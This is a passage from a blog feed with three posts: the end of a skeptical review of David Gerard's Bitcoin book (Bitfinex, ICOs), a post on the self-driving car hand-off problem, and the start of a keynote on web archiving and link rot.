a skepticism about decisions being made behind closed doors.</blockquote>Gerard quotes <a href="http://p2pfoundation.ning.com/forum/topics/bitcoin-open-source">Satoshi Nakamoto's release note for Bitcoin 0.1</a>:<br /><blockquote class="tr_bq">The root problem with conventional currency is all the trust that's required to make it work. The central bank must be trusted not to debase the currency, but the history of fiat currencies is full of breaches of that trust. Banks must be trusted to hold our money and transfer it electronically, but they lend it out in waves of credit bubbles with barely a fraction in reserve. We have to trust them with our privacy, trust them not to let identity thieves drain our accounts. Their massive overhead costs make micropayments impossible.</blockquote>And points out that:<br /><blockquote class="tr_bq">Bitcoin failed at every one of Nakamoto's aspirations here. The price is ridiculously volatile and has had multiple bubbles; the unregulated exchanges (with no central bank backing) front-run their customers, paint the tape to manipulate the price, and are hacked or just steal their user's funds; and transaction fees and the unreliability of transactions make micropayments completely unfeasible.</blockquote>Instead, Bitcoin is a scheme to transfer money from later to earlier adopters:<br /><blockquote class="tr_bq">Bitcoin was substantially mined early on - early adopters have <i>most</i> of the coins. The design was such that early users would get vastly better rewards than later users for the same effort.<br /><br />Cashing in these early coins involves pumping up the price, then selling to later adopters, particularly in the bubbles. Thus Bitcoin was not a Ponzi or pyramid scheme, but a pump-and-dump. Anyone who bought in after the earliest days is functionally the sucker in the relationship.</blockquote>Satoshi Nakamoto mined (but has never used) nearly 5% of all the Bitcoin there will ever be, a stash now notionally worth $7.5B. The distribution of notional Bitcoin wealth is highly skewed:<br /><blockquote class="tr_bq">a <a href="http://www.businessinsider.com/bitcoin-inequality-2014-1">Citigroup analysis from early 2014</a> notes: "47 individuals hold about 30 percent, another 900 hold a further 20%, the next 10,000 about 25% and another million about 20%".</blockquote>Not that the early adopters' stashes are circulating:<br /><blockquote class="tr_bq"><a href="https://doi.org/10.1007/978-3-642-39884-1_2">Dorit Ron and Adi Shamir found in a 2012 study</a> that only 22% of then-existing bitcoins were in circulation at all, there were a total of 75 active users or businesses with any kind of volume, one (unidentified) user owned a quarter of all bitcoins in existence, and one large owner was tying to hide their pile by moving it around in thousands of smaller transactions. </blockquote>In the Citigroup analysis, <a href="http://www.businessinsider.com/bitcoin-inequality-2014-1">Steven Englander wrote</a>:<br /><blockquote>The uneven distribution of Bitcoin wealth may be the price to be paid for getting a rapid dissemination of the Bitcoin payments and store of value technology. If you build a better mousetrap, everyone expects you to profit from your invention, but users benefit as well, so there are social benefits even if the innovator grabs a big share.</blockquote>Well, yes, but in this case the 1% of the population who innovated appear to have grabbed about 80% of the wealth, which is a bit excessive.<br /><br />Since there are very few legal things you can buy with Bitcoin (see Gerard's Chapter 7) this notional wealth is only real if you can convert it into a fiat currency such as USD with which you <i>can</i> buy legal things. There are two problems doing so.<br /><br />First, Nakamoto's million-Bitcoin hoard is not actually worth $7.5B. It is worth however many dollars other people would pay for it, which would be a whole lot less than $7.5B:<br /><blockquote class="tr_bq">large holders trying to sell their bitcoins risk causing a flash crash; the price is not realisable for any substantial quantity. The market remains thin enough that single traders can send the price up or down $30, and an April 2017 crash from $1180 to 6 cents (due to configuration errors on Coinbase's GDAX exchange) was courtesy of 100 BTC of trades.</blockquote>Second, Jonathan Thornburg was prophetic but not the way he thought:<br /><blockquote class="tr_bq">A week after Bitcoin 0.1 was released, Jonathan Thornburg wrote on the Cryptography and Cryptography Policy mailing list: "To me, this means that no major government is likely to allow Bitcoin in its present form to operate on a large scale."</blockquote>Governments have no problem with people using electricity to compute hashes. As <a href="https://en.wikipedia.org/wiki/Ross_Ulbricht">Dread Pirate Roberts</a> found out, they have ways of making their unhappiness clear when this leads to large-scale purchases of illicit substances. But they get really serious when this leads to large-scale evasion of taxes and currency controls.<br /><br />Governments and the banks they charter like to control their money. The exchanges on which, in practice, almost all cryptocurrency transactions take place are, in effect, financial institutions but are not banks. To move fiat money to and from users the exchanges need to use actual banks. This is where governments exercise control, with regulations such as the US Know Your Customer/Anti Money Laundering regulations. These make it very difficult to convert Bitcoin into fiat currency without revealing real identities and thus paying taxes or conforming to currency controls.<br /><br />Gerard stresses that Bitcoin is in practice a Chinese phenomenon, both on the mining side:<br /><blockquote class="tr_bq">From 2014 onward, the mining network was based almost entirely in China, running ASICs on very cheap subsidised local electricity (There has long been speculation that much of this is to evade currency controls - buy electricity in yuan, sell bitcoins for dollars) </blockquote>And on the trading side:<br /><blockquote class="tr_bq">Approximately <a href="https://www.coindesk.com/state-of-bitcoin-blockchain-2016/">95% of on-chain transactions</a> are day traders on Chinese exchanges; Western Bitcoin advocates are functionally a sideshow, apart from the actual coders who work on the Bitcoin core software.</blockquote>Gerard agrees with my analysis in <a href="http://blog.dshr.org/2014/10/economies-of-scale-in-peer-to-peer.html">Economies of Scale in Peer-to-Peer Networks</a> that economics made decentralization impossible to sustain:<br /><blockquote class="tr_bq">Everything about mining is more efficient in bulk. By the end of 2016, 75% of the bitcoin hashrate was being generated in <i>one building</i>,<a href="http://www.newsbtc.com/2016/11/04/bitmain-response-new-mining-center/"> using 140 megawatts</a> - or over half the estimated power used by <i>all</i> of Google's data centres worldwide.</blockquote>This is the one case where I failed to verify Gerard's citation. The <a href="http://www.newsbtc.com/2016/11/04/bitmain-response-new-mining-center/">post he links to at NewsBTC</a> says (my emphasis):<br /><blockquote class="tr_bq">According to available information, the Bitmain Cloud Computing Center in Xinjiang, Mainland China <i>will be</i> a 45 room facility with three internal filters maintaining a clean environment. The 140,000 kW facility will also include independent substations and office space.</blockquote>The post suggests that the facility wasn't to be completed until the following month, and quotes a <a href="https://mobile.twitter.com/petertoddbtc/status/793877455639498752">tweet from Peter Todd</a> (my emphasis):<br /><blockquote class="tr_bq">So that's <i>potentially</i> as much as 75% of the current Bitcoin hashing power in one place</blockquote>Gerard appears to have been somewhat ahead of the game.<br /><br />The most interesting part of the book is Gerard's discussion of Bitfinex, and his explanation for the current bubble in Bitcoin. You need to read the whole thing, but briefly:<br /><ul><li>Bitfinex was based on the code from Bitcoinica, written by a 16-year old. The code was a mess.</li><li>As a result, in August 2016 nearly 120K BTC (then quoted at around $68M) was stolen from Bitfinex customer accounts.</li><li>Bitfinex avoided bankruptcy by imposing a 36% haircut across all its users' accounts.</li><li>Bitfinex offered the users "tokens", which they eventually, last April, redeemed for USD at roughly half what the stolen Bitcoins were then worth.</li><li>But by then Bitfinex's Taiwanese banks could no longer send USD wires, because Wells Fargo cut them off.</li><li>So the "USD" were trapped at Bitfinex, and could only be used to buy Bitcoin or other cryptocurrencies on Bitfinex. This caused the Bitcoin price on Bitfinex to go up.</li><li>Arbitrage between Bitfinex and the other exchanges (which also have trouble getting USD out) caused the price on other exchanges to rise.</li></ul>Gerard points out that this mechanism drives the current <a href="https://ftalphaville.ft.com/series/ICOmedy">Initial Coin Offering mania</a>:<br /><blockquote class="tr_bq">The trapped "USD" also gets used to buy other cryptocurrencies - the price of altcoins tends to rise and fall with the price of bitcoins - and this has fueled new ICOs ... as people desperately look for somewhere to put their unspendable "dollars". This got Ethereum and ICOs into the bubble as well.</blockquote>In a November 3 post to <a href="https://davidgerard.co.uk/blockchain/">his blog</a>, Gerard <a href="https://davidgerard.co.uk/blockchain/2017/11/03/news-bitfinex-crypto-withdrawal-problems-sec-vs-celebrity-icos-tapscott-ico-scammers-magic-bubbles/">reports that</a>:<br /><blockquote class="tr_bq">You haven’t been able to get actual money out of Bitfinex since mid-March, but now there are increasing user reports of <a href="https://np.reddit.com/r/bitfinex/comments/7a5z5x/withdrawal_problem/">problems withdrawing cryptos as well</a> (<a href="https://archive.is/Tjfa2">archive</a>). </blockquote>Don't worry, the Bitcoin trapped like the USD at Bitfinex can always be used in the next ICO! Who cares about <a href="https://www.sec.gov/news/public-statement/statement-potentially-unlawful-promotion-icos">the SEC</a>:<br /><blockquote class="tr_bq">Celebrities and others have recently promoted investments in Initial Coin Offerings (ICOs).&nbsp; In the <a href="https://www.sec.gov/litigation/investreport/34-81207.pdf">SEC’s Report of Investigation</a> concerning The DAO, the Commission warned that virtual tokens or coins sold in ICOs may be securities, and those who offer and sell securities in the United States must comply with the federal securities laws.</blockquote>Or <a href="https://www.bloomberg.com/news/articles/2017-09-04/china-central-bank-says-initial-coin-offerings-are-illegal">the Chinese authorities</a>:<br /><blockquote class="tr_bq">The People's Bank of China said on its website Monday that it had completed investigations into ICOs, and will strictly punish offerings in the future while penalizing legal violations in ones already completed. The regulator said that those who have already raised money must provide refunds, though it didn't specify how the money would be paid back to investors. </blockquote>This post can only give a taste of an entertaining and instructive book, well worth giving to the Bitcoin enthusiasts in your life. Or you can point them to Izabella Kaminska's interview of David Gerard - it's a wonderfully <a href="https://soundcloud.com/user-544122300/gerardpod">skeptical take on blockchain technologies and markets</a>.David.http://www.blogger.com/profile/14498131502038331594noreply@blogger.com15tag:blogger.com,1999:blog-4503292949532760618.post-6983563485280594122017-11-14T08:00:00.004-08:002017-11-14T08:00:01.830-08:00Techno-hype part 1<div style="text-align: center;"><i>Don't, don't, don't, don't believe the hype!</i></div><div style="text-align: center;">Public Enemy</div><br />New technologies are routinely over-hyped because people under-estimate the <a href="http://blog.dshr.org/2017/10/will-hamr-happen.html">gap between a technology that works and a technology that is in everyday use</a> by normal people.<br /><br />You have probably figured out that I'm skeptical of the hype surrounding <a href="http://blog.dshr.org/search/label/bitcoin">blockchain technology</a>. Despite incident-free years spent routinely driving in company with Waymo's self-driving cars, I'm also skeptical of the self-driving car hype. Below the fold, an explanation.<br /><a name='more'></a><br />Clearly, self-driving cars <a href="https://arstechnica.com/cars/2017/10/what-its-like-to-ride-in-a-waymo-driverless-car/">driven by a trained self-driving car driver in Bay Area traffic work fine</a>:<br /><blockquote>We've known for several years now that Waymo's (previously Google's) cars can handle most road conditions without a safety driver intervening. Last year, the company reported that its cars could go about 5,000 miles on California roads, on average, between human interventions. </blockquote><table cellpadding="0" cellspacing="0" class="tr-caption-container" style="float: right; margin-left: 1em; text-align: right;"><tbody><tr><td style="text-align: center;"><a href="https://4.bp.blogspot.com/-p5S9-3uwX9k/Wf-EHFDd3QI/AAAAAAAAEAg/_H6nPYUZhvUYyzZehXKCF4AXh1rDEHulACLcBGAs/s1600/AV-graph-1.png" imageanchor="1" style="clear: right; margin-bottom: 1em; margin-left: auto; margin-right: auto;"><img border="0" data-original-height="515" data-original-width="975" height="105" src="https://4.bp.blogspot.com/-p5S9-3uwX9k/Wf-EHFDd3QI/AAAAAAAAEAg/_H6nPYUZhvUYyzZehXKCF4AXh1rDEHulACLcBGAs/s200/AV-graph-1.png" width="200" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;"><a href="https://www.rmi.org/news/safe-self-driving-cars/">Crashes per 100M miles</a></td></tr></tbody></table>Waymo's cars are <a href="https://www.rmi.org/news/safe-self-driving-cars/">much safer than almost all human drivers</a>:<br /><blockquote class="tr_bq">Waymo has logged over two million miles on U.S. streets and has only had fault in <a href="https://www.usatoday.com/story/tech/news/2016/02/29/google-car-hits-bus-first-time-fault/81115258/">one accident</a>, making its cars by far the lowest at-fault rate of any driver class on the road— about <b>10 times lower</b> than our safest demographic of human drivers (60–69 year-olds) and <b>40 times lower</b> than new drivers, not to mention the obvious benefits gained from <a href="http://blog.rmi.org/news/robots-dont-drink-drive/">eliminating drunk drivers</a>.<br /><br />However, Waymo’s vehicles have a knack for getting hit by human drivers. When we look at total accidents (at fault and not), the Waymo accident rate is higher than the accident rate of most experienced drivers ... Most of these accidents are fender-benders caused by humans, with no fatalities or serious injuries. The leading theory is that Waymo’s vehicles adhere to the letter of traffic law, leading them to brake for things they are legally supposed to brake for (e.g., pedestrians approaching crosswalks). Since human drivers are not used to this lawful behavior, it leads to a higher rate of rear-end collisions (where the human driver is at-fault).</blockquote>Clearly, this is a technology that works. I would love it if my grand-children never had to learn to drive, but even a decade from now I think they will still need to. <br /><br />But, as Google realized some time ago, just being safer on average than most humans almost all the time is not enough for mass public deployment of self-driving cars. Back in June, <a href="https://www.nytimes.com/2017/06/07/technology/google-self-driving-cars-handoff-problem.html">John Markoff wrote</a>:<br /><blockquote class="tr_bq">Three years ago, Google’s self-driving car project abruptly shifted from designing a vehicle that would drive autonomously most of the time while occasionally requiring human oversight, to a slow-speed robot without a brake pedal, accelerator or steering wheel. In other words, human driving was no longer permitted.<br /><br />The company made the decision after giving self-driving cars to Google employees for their work commutes and recording what the passengers did while the autonomous system did the driving. In-car cameras recorded employees climbing into the back seat, climbing out of an open car window, and even smooching while the car was in motion, according to two former Google engineers.<br /><br />“We saw stuff that made us a little nervous,” Chris Urmson, a roboticist who was then head of the project, <a href="https://www.nytimes.com/2014/05/28/technology/googles-next-phase-in-driverless-cars-no-brakes-or-steering-wheel.html">said</a> at the time. He later mentioned in a blog post that the company had spotted a number of “silly” actions, including the driver turning around while the car was moving.<br /><br />Johnny Luu, a spokesman for Google’s self-driving car effort, now called Waymo, disputed the accounts that went beyond what Mr. Urmson described, but said behavior like an employee’s rummaging in the back seat for his laptop while the car was moving and other “egregious” acts contributed to shutting down the experiment. </blockquote><a href="https://www.theregister.co.uk/2017/10/31/google_waymo_ditched_autopilot/">Gareth Corfield at <i>The Register</i> adds</a>:<br /><blockquote class="tr_bq">Google binned its self-driving cars' "take over now, human!" feature because test drivers kept dozing off behind the wheel instead of watching the road, according to reports.<br /><br />"What we found was pretty scary," Google Waymo's boss John Krafcik told <i>Reuters</i> reporters during a recent media tour of a Waymo testing facility. "It's hard to take over because they have lost contextual awareness." ...<br /><br />Since then, <a href="https://uk.reuters.com/article/uk-alphabet-autos-self-driving/google-ditched-autopilot-driving-feature-after-test-user-napped-behind-wheel-idUKKBN1D00QM">said</a> Reuters, Google Waymo has focused on technology that does not require human intervention.</blockquote><a href="https://arstechnica.com/cars/2017/10/what-its-like-to-ride-in-a-waymo-driverless-car/">Timothy B. Lee at <i>Ars Technica</i> writes</a>:<br /><blockquote>Waymo cars are designed to never have anyone touch the steering wheel or pedals. So the cars have a greatly simplified four-button user interface for passengers to use. There are buttons to call Waymo customer support, lock and unlock the car, pull over and stop the car, and start a ride. </blockquote>But, during a recent show-and-tell with reporters, they w<a href="https://arstechnica.com/cars/2017/10/what-its-like-to-ride-in-a-waymo-driverless-car/">eren't allowed to press the "pull over" button</a>:<br /><blockquote class="tr_bq">a Waymo spokesman tells Ars that the "pull over" button does work. However, the event had a tight schedule, and it would have slowed things down too much to let reporters push it.</blockquote>Google was right to identify the "hand-off" problem as essentially insoluble, because the human driver would have lost "situational awareness".<br /><br />Jean-Louis Gassée has an appropriately <a href="https://mondaynote.com/autonomous-cars-the-level-5-fallacy-247ae9614e14">skeptical take on the technology</a>, based on interviews with Chris Urmson:<br /><blockquote>Google’s Director of Self-Driving Cars from 2013 to late 2016 (he had joined the team in 2009). In a&nbsp;<a href="https://www.apple.com/">SXSW</a>&nbsp;talk in early 2016, Urmson gives a&nbsp;<a href="https://www.youtube.com/watch?v=Uj-rK8V-rik&amp;feature=youtu.be">sobering yet helpful vision</a>&nbsp;of the project’s future, summarized by&nbsp;<a href="https://www.technologyreview.com/contributor/lee-gomes/">Lee Gomes</a>in an&nbsp;<a href="http://spectrum.ieee.org/cars-that-think/transportation/self-driving/google-selfdriving-car-will-be-ready-soon-for-some-in-decades-for-others">IEEE Spectrum article</a>&nbsp;[as always, edits and emphasis mine]:<br /><br /><i>“Not only might it take much longer to arrive than the company has ever indicated — <b>as long as 30 years</b>, said Urmson — but the early commercial versions might well be limited to certain geographies and weather conditions.&nbsp;<b>Self-driving cars are much easier to engineer for sunny weather and wide-open roads</b>, and Urmson suggested the cars might be sold for those markets first.”</i></blockquote>But the problem is actually much worse than either Google or Urmson say. Suppose, for the sake of argument, that self-driving cars three times as good as Waymo's are in wide use by normal people. A normal person would encounter a hand-off once in 15,000 miles of driving, or less than <a href="http://cars.lovetoknow.com/about-cars/how-many-miles-do-americans-drive-per-year">once a year</a>. Driving would be something they'd be asked to do maybe 50 times in their life.<br /><br />Even if, when the hand-off happened, the human was not "climbing into the back seat, climbing out of an open car window, and even smooching" and had full "situational awareness", they would be faced with a situation too complex for the car's software. How likely is it that they would have the skills needed to cope, when the last time they did any driving was over a year ago, and on average they've only driven 25 times in their life? Current testing of self-driving cars hands-off to drivers with more than a decade of driving experience, well over 100,000 miles of it. It bears no relationship to the hand-off problem with a mass deployment of self-driving technology.<br /><br />Remember the <a href="https://en.wikipedia.org/wiki/Air_France_Flight_447">crash of AF447</a>?<br /><blockquote class="tr_bq">the aircraft crashed after temporary inconsistencies between the airspeed measurements&nbsp;– likely due to the aircraft's pitot tubes being obstructed by ice crystals&nbsp;– caused the autopilot to disconnect, after which the crew reacted incorrectly and ultimately caused the aircraft to enter an aerodynamic stall, from which it did not recover.</blockquote>This was a hand-off to a crew that was highly trained, but had never before encountered a hand-off during cruise. What this means is that unrestricted mass deployment of self-driving cars requires <a href="https://www.caranddriver.com/features/path-to-autonomy-self-driving-car-levels-0-to-5-explained-feature">Level 5 autonomy</a>:<br /><blockquote><b>Level 5 _ Full Automation</b><br /><br /><i><b>System capability:&nbsp;</b></i>The driverless car can operate on any road and in any conditions a human driver could negotiate. •<i><b> Driver involvement:&nbsp;</b></i>Entering a destination.</blockquote>Note that Waymo is just starting to <a href="https://www.theatlantic.com/technology/archive/2017/08/inside-waymos-secret-testing-and-simulation-facilities/537648/">work with Level 4 cars</a> (the link is to a fascinating piece by Alexis C. Madrigal on Waymo's simulation and testing program). There are many other difficulties on the way to mass deployment, outlined by <a href="https://arstechnica.com/cars/2017/10/waymo-has-a-big-lead-in-driverless-cars-but-heres-how-they-could-lose-it/2/">Timothy B. Lee at <i>Ars Technica</i></a>. Although Waymo is actually testing Level 4 cars in the <a href="https://www.nytimes.com/2017/11/07/technology/waymo-autonomous-cars.html?_r=0">benign environment of Phoenix, AZ</a>:<br /><blockquote class="tr_bq">Waymo, the autonomous car company from Google’s parent company Alphabet, has started testing a fleet of self-driving vehicles without any backup drivers on public roads, its chief executive officer said Tuesday. The tests, which will include passengers within the next few months, mark an important milestone that brings autonomous vehicle technology closer to operating without any human intervention.</blockquote>But the real difficulty is this. <i>The closer the technology gets to Level 5, the worse the hand-off problem gets, because the human has less experience</i>. Incremental progress in deployments doesn't make this problem go away. Self-driving taxis in restricted urban areas maybe in the next five years; a replacement for the family car, don't hold your breath. My grand-children will still need to learn to drive.<br /><br />David.http://www.blogger.com/profile/14498131502038331594noreply@blogger.com3tag:blogger.com,1999:blog-4503292949532760618.post-29949756621858467192017-11-06T18:00:00.000-08:002017-11-06T18:00:03.895-08:00Keynote at Pacific Neighborhood ConsortiumI was invited to deliver a keynote at the <a href="http://www.pnclink.org/pnc2017/">2017 Pacific Neighborhood Consortium</a> in Tainan, Taiwan. My talk, entitled <i>The Amnesiac Civilization</i>, was based on the <a href="http://blog.dshr.org/2017/03/the-amnesiac-civilization-part-1.html">series of posts</a> earlier this year with the same title. The theme was "Data Informed Society", and my abstract was:<br /><blockquote class="tr_bq">What is the data that informs a society? It is easy to think that it is just numbers, timely statistical information of the kind that drives Google Maps real-time traffic display. But the rise of text-mining and machine learning means that we must cast our net much wider. Historic and textual data is equally important. It forms the knowledge base on which civilization operates.<br /><br />For nearly a thousand years this knowledge base has been stored on paper, an affordable, durable, write-once and somewhat tamper-evident medium. For more than five hundred years it has been practical to print on paper, making Lots Of Copies to Keep Stuff Safe. LOCKSS is the name of the program at the Stanford Libraries that Vicky Reich and I started in 1998. We took a distributed approach; providing libraries with tools they could use to preserve knowledge in the Web world. They could work the way they were used to doing in the paper world, by collecting copies of published works, making them available to readers, and cooperating via inter-library loan. Two years earlier, Brewster Kahle had founded the Internet Archive, taking a centralized approach to the same problem.<br /><br />Why are these programs needed? What have we learned in the last two decades about their effectiveness? How does the evolution of Web technologies place their future at risk?</blockquote>Below the fold, the text of my talk.<br /><a name='more'></a><h3>Introduction</h3>I'm honored to join the ranks of your keynote speakers, and grateful for the opportunity to visit beautiful Taiwan. You don't need to take notes, or photograph the slides, or even struggle to understand my English, because the whole text of my talk, with links to the sources and much additional material in footnotes, has been posted to my blog.<br /><br />What is the data that informs a society? It is easy to think that it is just numbers, timely statistical information of the kind that drives Google Maps real-time traffic display. But the rise of text-mining and machine learning means that we must cast our net much wider. Historic and textual data is equally important. It forms the knowledge base on which civilization operates.<br /><br /><table cellpadding="0" cellspacing="0" class="tr-caption-container" style="float: right; margin-left: 1em; text-align: right;"><tbody><tr><td style="text-align: center;"><a href="https://1.bp.blogspot.com/-3BM12dYa-Kc/WagqApmpkmI/AAAAAAAAD3M/QL61I52zveQWtCTN6EFiwuQNI8KwwZ_VQCLcBGAs/s1600/Cai-lun.jpg" imageanchor="1" style="clear: right; margin-bottom: 1em; margin-left: auto; margin-right: auto;"><img border="0" data-original-height="469" data-original-width="375" height="200" src="https://1.bp.blogspot.com/-3BM12dYa-Kc/WagqApmpkmI/AAAAAAAAD3M/QL61I52zveQWtCTN6EFiwuQNI8KwwZ_VQCLcBGAs/s200/Cai-lun.jpg" width="159" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;"><a href="https://en.wikipedia.org/wiki/File:Cai-lun.jpg">Qing dynasty print of Cai Lun</a></td></tr></tbody></table>Ever since 105AD when <a href="https://en.wikipedia.org/wiki/Cai_Lun">Cai Lun (蔡伦)</a> invented the process for making <a href="https://en.wikipedia.org/wiki/History_of_paper">paper</a>, civilizations have used it to record their history and its context in everyday life. Archives and libraries collected and preserved originals. Scribes labored to create copies, spreading the knowledge they contained. <a href="https://en.wikipedia.org/wiki/Bi_Sheng">Bi Sheng's (毕昇)</a> invention of movable type in the 1040s AD greatly increased the spread of copies and thus knowledge, as did Choe Yun-ui's (최윤의) <a href="https://en.wikipedia.org/wiki/Choe_Yun-ui">1234 invention of bronze movable type</a> in Korea, <a href="https://en.wikipedia.org/wiki/Johannes_Gutenberg">Johannes Gutenberg's 1439 development of the metal type printing press</a> in Germany, and Hua Sui's (华燧) <a href="https://en.wikipedia.org/wiki/Hua_Sui">1490 introduction of bronze type in China</a>.<sup><a href="http://blog.dshr.org/2017/11/keynote-at-pacific-neighborhood.html#Footnote1">[1]</a></sup><br /><br />Thus for about two millennia civilizations have been able to store their knowledge base on this affordable, durable, write-once, and somewhat tamper-evident medium. For more than half a millennium it has been practical to print on paper, making Lots Of Copies to Keep Stuff Safe. But for about two decades the knowledge base has been migrating off paper and on to the Web.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-yjAQmAjn1lE/WcLaKih7gZI/AAAAAAAAD50/hA4AHmp_0YsmAQmSc75Q5Qoa04fbc7iFwCLcBGAs/s1600/LOCKSS.logo.png" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"><img border="0" data-original-height="151" data-original-width="151" src="https://1.bp.blogspot.com/-yjAQmAjn1lE/WcLaKih7gZI/AAAAAAAAD50/hA4AHmp_0YsmAQmSc75Q5Qoa04fbc7iFwCLcBGAs/s1600/LOCKSS.logo.png" /></a></div><a href="https://www.lockss.org/">Lots Of Copies Keep Stuff Safe </a>is the name of the program at the Stanford Libraries that Vicky Reich and I started 19 years ago last month. We took a distributed approach to preserving knowledge; providing libraries with tools they could use to continue in the Web world their role in the paper world of collecting copies of published works and making them available to readers. <a href="https://en.wikipedia.org/wiki/Internet_Archive">Two years earlier</a>, <a href="https://en.wikipedia.org/wiki/Brewster_Kahle">Brewster Kahle</a> had founded the <a href="https://www.archive.org/">Internet Archive</a>, taking a centralized approach to the same problem. <br /><br />My talk will address three main questions:<br /><ul><li>Why are these programs needed?</li><li>What have we learned in the last two decades about their effectiveness?</li><li>How does the evolution of Web technology place their future at risk?</li></ul><h3>Why archive the Web? </h3>Paper is a durable medium, but the Web is not. From its earliest days users have experienced "<a href="https://en.wikipedia.org/wiki/Link_rot">link rot</a>", links to pages that once existed but have vanished. Even in 1997 they saw it as a <a href="https://www.nngroup.com/articles/fighting-linkrot/">major problem</a>:<br /><blockquote class="tr_bq"><b>6% of the links on the Web are broken according to a <a href="https://web.archive.org/web/*/www.pantos.org/atw/35654.html">recent survey</a> by Terry Sullivan's <i>All Things Web</i>. Even worse, linkrot in May 1998 was double that found by a similar survey in August 1997.</b><br /><br />Linkrot definitely reduces the usability of the Web, being cited as one of the biggest problems in using the Web by <a href="https://web.archive.org/web/*/https://gvu.gatech.edu/user_surveys/survey-1997-10/graphs/use/Problems_Using_the_Web.html">60% of the users in the October 1997 GVU survey</a>. This percentage was up from "only" 50% in the April 1997 survey.<sup><a href="http://blog.dshr.org/2017/11/keynote-at-pacific-neighborhood.html#Footnote4">[4]</a></sup></blockquote><table cellpadding="0" cellspacing="0" class="tr-caption-container" style="float: right; margin-left: 1em; text-align: right;"><tbody><tr><td style="text-align: center;"><a href="https://3.bp.blogspot.com/-eHyJ0eokI5o/WYJTTZ7xMEI/AAAAAAAAD0k/4TpT5H9eM2En3r2x1z9nPo4ulpgsIx0pwCLcBGAs/s1600/LawrenceLinkRot.png" imageanchor="1" style="clear: right; margin-bottom: 1em; margin-left: auto; margin-right: auto;"><img border="0" data-original-height="378" data-original-width="819" height="91" src="https://3.bp.blogspot.com/-eHyJ0eokI5o/WYJTTZ7xMEI/AAAAAAAAD0k/4TpT5H9eM2En3r2x1z9nPo4ulpgsIx0pwCLcBGAs/s200/LawrenceLinkRot.png" width="200" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;"><a href="https://doi.org/10.1109/2.901164">Figure 1b</a></td></tr></tbody></table>Research at scale in 2001 by <a href="https://doi.org/10.1109/2.901164">Lawrence <i>et al</i></a> validated this concern. They:<br /><blockquote class="tr_bq">analyzed 270,977 computer science journal papers, conference papers, and technical reports ... From the 100,826 articles cited by another article in the database (thus providing us with the year of publication), we extracted 67,577 URLs. ... Figure 1b dramatically illustrates the lack of persistence of Internet resources. <b>The percentage of invalid links in the articles we examined varied from 23 percent in 1999 to a peak of 53 percent in 1994</b>. </blockquote>The problem is worse than this. Martin Klein and co-authors point out that <a href="https://dx.doi.org/10.1371/journal.pone.0167475">Web pages suffer two forms of decay</a> or reference rot:<br /><blockquote><ul><li><b>Link rot</b>: The resource identified by a URI vanishes from the web. As a result, a URI reference to the resource ceases to provide access to referenced content.</li><li><b>Content drift</b>: The resource identified by a URI changes over time. The resource’s content evolves and can change to such an extent that it ceases to be representative of the content that was originally referenced.</li></ul></blockquote><table cellpadding="0" cellspacing="0" class="tr-caption-container" style="float: right; margin-left: 1em; text-align: right;"><tbody><tr><td style="text-align: center;"><a data-versiondate="20161214231400" data-versionurl="https://web.archive.org/web/20161214231036/https://3.bp.blogspot.com/-G--CbbdzJcY/WFHFf8QTpgI/AAAAAAAADkE/peLWWrbq0i0f-pdGFgc5zG8lwMcNcJzkQCLcB/s1600/journal.pone.0167475.g012.PNG" href="https://3.bp.blogspot.com/-G--CbbdzJcY/WFHFf8QTpgI/AAAAAAAADkE/peLWWrbq0i0f-pdGFgc5zG8lwMcNcJzkQCLcB/s1600/journal.pone.0167475.g012.PNG" style="clear: right; margin-bottom: 1em; margin-left: auto; margin-right: auto;"><img border="0" height="147" src="https://3.bp.blogspot.com/-G--CbbdzJcY/WFHFf8QTpgI/AAAAAAAADkE/peLWWrbq0i0f-pdGFgc5zG8lwMcNcJzkQCLcB/s200/journal.pone.0167475.g012.PNG" width="200" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;"><a href="http://journals.plos.org/plosone/article?id=10.1371/journal.pone.0167475">Similarity over time at arXiv</a></td></tr></tbody></table>They <a href="http://dx.doi.org/10.1371/journal.pone.0115253">examined scholarly literature on the Web</a> and found:<br /><blockquote>one out of five STM articles suffering from reference rot, meaning it is impossible to revisit the web context that surrounds them some time after their publication. <b>When only considering STM articles that contain references to web resources, this fraction increases to seven out of ten.</b></blockquote><a href="https://dx.doi.org/10.1371/journal.pone.0167475">The problem gets worse through time</a>:<br /><blockquote><b>even for articles published in 2012 only about 25% of referenced resources remain unchanged by August of 2015.</b> This percentage steadily decreases with earlier publication years, although the decline is markedly slower for arXiv for recent publication years. It reaches about 10% for 2003 through 2005, for arXiv, and even below that for both Elsevier and PMC. </blockquote>Thus, as the arXiv graph shows, they find that, after a few years, it is very unlikely that a reader clicking on a web-at-large link in an article will see what the author intended.<br /><br /><table cellpadding="0" cellspacing="0" class="tr-caption-container" style="float: right; margin-left: 1em; text-align: right;"><tbody><tr><td style="text-align: center;"><a href="https://3.bp.blogspot.com/-AFpMLEvq11M/WFHEeaHkx2I/AAAAAAAADkA/Hk0OhBYdxsgibc1lCBeq9odMQo6ZhSBUACLcB/s1600/AndyJacksonLinkRot.jpg" style="clear: right; margin-bottom: 1em; margin-left: auto; margin-right: auto;"><img border="0" height="150" src="https://3.bp.blogspot.com/-AFpMLEvq11M/WFHEeaHkx2I/AAAAAAAADkA/Hk0OhBYdxsgibc1lCBeq9odMQo6ZhSBUACLcB/s200/AndyJacksonLinkRot.jpg" width="200" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;"><a data-versiondate="20151126132720" data-versionurl="https://web.archive.org/web/*/http://britishlibrary.typepad.co.uk/.a/6a00d8341c464853ef01b7c7cffded970b-pi" href="http://britishlibrary.typepad.co.uk/.a/6a00d8341c464853ef01b7c7cffded970b-pi">Source</a></td></tr></tbody></table>This isn't just a problem for scholarly literature, it is even worse on the general Web. The British Library's Andy Jackson <a data-versiondate="20151126132720" data-versionurl="https://web.archive.org/web/20151126132720/http://britishlibrary.typepad.co.uk/webarchive/2015/09/ten-years-of-the-uk-web-archive-what-have-we-saved.html" href="http://britishlibrary.typepad.co.uk/webarchive/2015/09/ten-years-of-the-uk-web-archive-what-have-we-saved.html">analyzed the UK Web Archive</a> and: <br /><blockquote><b>was shocked by how quickly link rot and content drift come to dominate the scene. 50% of the content is lost after just one year, with more being lost each subsequent year.</b> However, it’s worth noting that the loss rate is not maintained at 